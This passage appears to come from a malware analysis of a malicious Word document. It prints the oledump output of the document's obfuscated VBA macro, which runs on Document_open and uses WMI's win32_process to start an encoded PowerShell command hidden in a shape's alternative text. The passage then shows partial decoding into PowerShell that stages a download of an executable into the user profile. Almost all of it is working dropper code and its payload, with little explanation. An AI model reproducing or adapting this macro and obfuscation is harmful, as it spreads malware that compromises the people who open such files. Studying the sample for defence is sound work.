hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Xozc8rstu7ryx7r, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Mnepnu4zd_o, 168, 1)\r\nUCPVYn = Mid _\r\n(Ixj70flcnwywxjwol, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Np75dqjjjnw_08dy, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nB4ru9eb_hhowd = Sg918dyn87p9_2 + Join(Hy1d43_mrbnkby5l, Gcqeayz9i6vt1m44y1)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Rn60_vw9ki0a5akw, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Mqesnmb7i1uj3elp, 212, 1)\r\nBiHOVG = Mid _\r\n(Kl93_qjt6042y, 35, 1)\r\nGQJzwq = Mid _\r\n(Cv_b0_hlb4d3, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Aztexwux_z7ra7_tn, 9, 1)\r\nlsFUF = Mid _\r\n(Dvvry4cnpbdj, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Rivi6l6gfdte, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Cv0ei3yv9gkva2bkgs, 179, 1)\r\nwYVOV = Mid _\r\n(Suhjpxfhscarcm3, 190, 1)\r\nmLdZb = Mid _\r\n(Nol5lvu2bly6v580, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Zon7lurdvgt9zhi, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Bt76zhearid_, 168, 1)\r\nUCPVYn = Mid _\r\n(Qygb8c9p4h652, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Ka4mdpvtlae73kmp, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nZk46e7c8d40 = B4ru9eb_hhowd\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(J2hq9d7fh_35w37, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Qzaz3l4map05, 212, 1)\r\nBiHOVG = Mid _\r\n(E6d_d1y90o683, 35, 1)\r\nGQJzwq = Mid _\r\n(X2ft_p4no8w4b9, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Lteb3aez6tchkykg3, 9, 1)\r\nlsFUF = Mid _\r\n(V8v770pv4qg, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Hz1ct716aq3cl, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Yhszd264hbjuxgxgiz, 179, 1)\r\nwYVOV = Mid _\r\n(Minshfpq8_oetv8, 190, 1)\r\nmLdZb = Mid _\r\n(Fcdnqtsrz50, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Oi5idu52uzlu, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(H94481_2epeelc92, 168, 1)\r\nUCPVYn = Mid _\r\n(Uogg7zgfb_2frt3uyf, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Sz4d_sp41e3r7ay, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nEnd Function\r\nFunction Qfyk87zgdp86ufle()\r\nOn Error Resume Next\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(M7xg60mfwvhnr6jtot, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Y0gc8q4z0esg, 212, 1)\r\nBiHOVG = Mid _\r\n(Hfm2hak4b9qmfoo9y5, 35, 1)\r\nGQJzwq = Mid _\r\n(Onxbk521bjnb, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Kjcmstmoio7, 9, 1)\r\nlsFUF = Mid _\r\n(T12bp3lknww, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Cc9qkjty8m98mcpf, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Um02aud_yxsc22, 179, 1)\r\nwYVOV = Mid _\r\n(Qoiqw7d07ieo451mm, 190, 1)\r\nmLdZb = Mid _\r\n(Uvjx9ds5rxxb, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Ewdk950uwzndt8g, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(D9kf89fu_qe03, 168, 1)\r\nUCPVYn = Mid _\r\n(Lm5w04zu4tnwh8, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Ophmulzn8ziqtkrza4, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nPuw2oumxgis = "powe" + "rshe" + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Oeqcm_gbql69pr, 196, 1)\r\ndYvJsnjw = Mid _\r\n(P4gtyykmim4tkfkr6, 212, 1)\r\nBiHOVG = Mid _\r\n(Yj6i49td8tp, 35, 1)\r\nGQJzwq = Mid _\r\n(R181wcx8d2k3h2uq, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Xf6_7qi8najau238uy, 9, 1)\r\nlsFUF = Mid _\r\n(Quui500h0da, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Jchbnv14jz4, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Bn8u_t6ycr5m, 179, 1)\r\nwYVOV = Mid _\r\n(Yab9jj5m079n1, 190, 1)\r\nmLdZb = Mid _\r\n(I66492lgrboiqi, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Z8i7zqvz7ap_8, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(M_hkft4hz7v, 168, 1)\r\nUCPVYn = Mid _\r\n(Tu_ta5w00_z, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(A02g_3t3od0ch0, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nQfyk87zgdp86ufle = Zk46e7c8d40(Puw2oumxgis)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(C79um_qaar3a8crt, 196, 1)\r\ndYvJsnjw = Mid _\r\n(T9s69dfveqqh1ef5nq, 212, 1)\r\nBiHOVG = Mid _\r\n(Mxpn2nii2x7, 35, 1)\r\nGQJzwq = Mid _\r\n(X9bz6a6f43_hta5ln, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Fuxrbkmu2s17p0j, 9, 1)\r\nlsFUF = Mid _\r\n(Okzpk4tkizyh62u, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Weplip72nljnq8na09, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Ox9mobnimxe1_9, 179, 1)\r\nwYVOV = Mid _\r\n(Alt9nfo0b_tg5lmxi, 190, 1)\r\nmLdZb = Mid _\r\n(Hak93bk7htdjvkpy8c, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Bvlfz7n67t8aa75, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Ysctrxs9764oj2fp, 168, 1)\r\nUCPVYn = Mid _\r\n(Dhl_7wcpgpmks, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(J3vsg6taodn, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nEnd Function\r\n<\/pre>\n\r\nherbie$ .\/oledump.py -v -s 13 LRE-090120\\ JYW-092120.doc \r\nAttribute VB_Name = "V216c23yqw7e5o2v"\r\nAttribute VB_Base = "1Normal.ThisDocument"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\nPrivate Sub Document_open()\r\nP72j6t412f1985pd6 = Array(J0uidqx1c0a3u + "Th1h6l0aavkju7xS367iljm3kweq5z0v E1eiiunn0096" + Tdkjj9ylr9nquz5ug8, Rn29ystlt6mlp, Uoepmfd2vqk2.Cbzdhgt82a6foxc53q, K7bfvpb88z323z6t43 + "Pgtagw22wfq Q9sf54owsl3 Bf925racvi5276 N6yp3qvf4kub2oguk")\r\nEnd Sub\r\n<\/pre>\n
\r\nFunction Cbzdhgt82a6foxc53q()\r\n\tOn Error Resume Next\r\n\tQuuseim6entz = 90\r\n\tAy7pmbj8ld_rk9 = Vc0veos27yszc + Chr$(Quuseim6entz + (25))\r\n\tIhietwpuyrj0nq6 = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + Ay7pmbj8ld_rk9 + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + p + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,"\r\n\tWuueqzhfpms6gh3_p = Zk46e7c8d40(Ihietwpuyrj0nq6)\r\n\tSet Cfsnuq6d3vy5e = CreateObject(Wuueqzhfpms6gh3_p)\r\n\tOxxxpk19hkgi4c7c0z = Zdlifyn2pwzi0u2e4i + Wuueqzhfpms6gh3_p + Ay7pmbj8ld_rk9 + Uoepmfd2vqk2.W8w3wpmit80chp7lx + Uoepmfd2vqk2.Dd8cp5opvyber\r\n\tSet Tn1cdl9lltyho4skel = Ngdcwyg32b4skvo5c1(Oxxxpk19hkgi4c7c0z + Uoepmfd2vqk2.Wjhx20hqda94eekj)\r\n\tCfsnuq6d3vy5e.Create Qfyk87zgdp86ufle, P3_qwk943i1k8ql6, Tn1cdl9lltyho4skel\r\nEnd Function\r\n\r\nFunction Zk46e7c8d40(G7b_e54iwh7id_)\r\n\tOn Error Resume Next\r\n\tX8e38jclqayh83g3a6 = CleanString(G7b_e54iwh7id_)\r\n\tHy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, "g, bq,")\r\n\tB4ru9eb_hhowd = Sg918dyn87p9_2 + Join(Hy1d43_mrbnkby5l, Gcqeayz9i6vt1m44y1)\r\n\tZk46e7c8d40 = B4ru9eb_hhowd\r\nEnd Function\r\n\r\nFunction Ngdcwyg32b4skvo5c1(Wu67qms7o3ov3f_u2)\r\n\tOn Error Resume Next\r\n\tSet Ngdcwyg32b4skvo5c1 = GetObject(Wu67qms7o3ov3f_u2)\r\n\tshowwindow = wdKeyEquals - wdKeyEquals\r\nEnd Function\r\n\r\nFunction Qfyk87zgdp86ufle()\r\n\tOn Error Resume Next\r\n\tPuw2oumxgis = "powe" + "rshe" + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$\r\n\tQfyk87zgdp86ufle = Zk46e7c8d40(Puw2oumxgis)\r\n\tEnd Function\r\n<\/pre>\n
<\/a><\/p>\n\r\nPuw2oumxgis = "powe" + "rshe" + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$\r\n<\/pre>\n
<\/a><\/p>\n\r\ng, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9\r\n<\/pre>\n
\r\n,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9\r\n<\/pre>\n
\r\n$Uevwzgz=((B+knt)+(45+p));\r\n&(ne+w-it+em) $ENV:usErprOFile\\yv3Wm9g\\wZN78e8\\ -itemtype dIReCToRy;\r\n[Net.ServicePointManager]::"SECUrITYPROtOCol" = ((tls+12,)+ t+(l+s11, t)+l+s);\r\n$Q3ywioo = ((T+ii)+(0+bc)+p);\r\n$Efe5qz9=(W+(z+5d4)+4e);\r\n$Bnp_s5v=$env:userprofile+(((g+QWY+v3)+w+m+9g+(gQ+W)+(Wz+n7)+8e+(8gQ+W))."replAce"(([ChAr]103+[ChAr]81+[ChAr]87),[sTRING][ChAr]92))+$Q3ywioo+(.+(ex+e));\r\n$Xstbuxr\r\n<\/pre>\n
\r\ng, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, 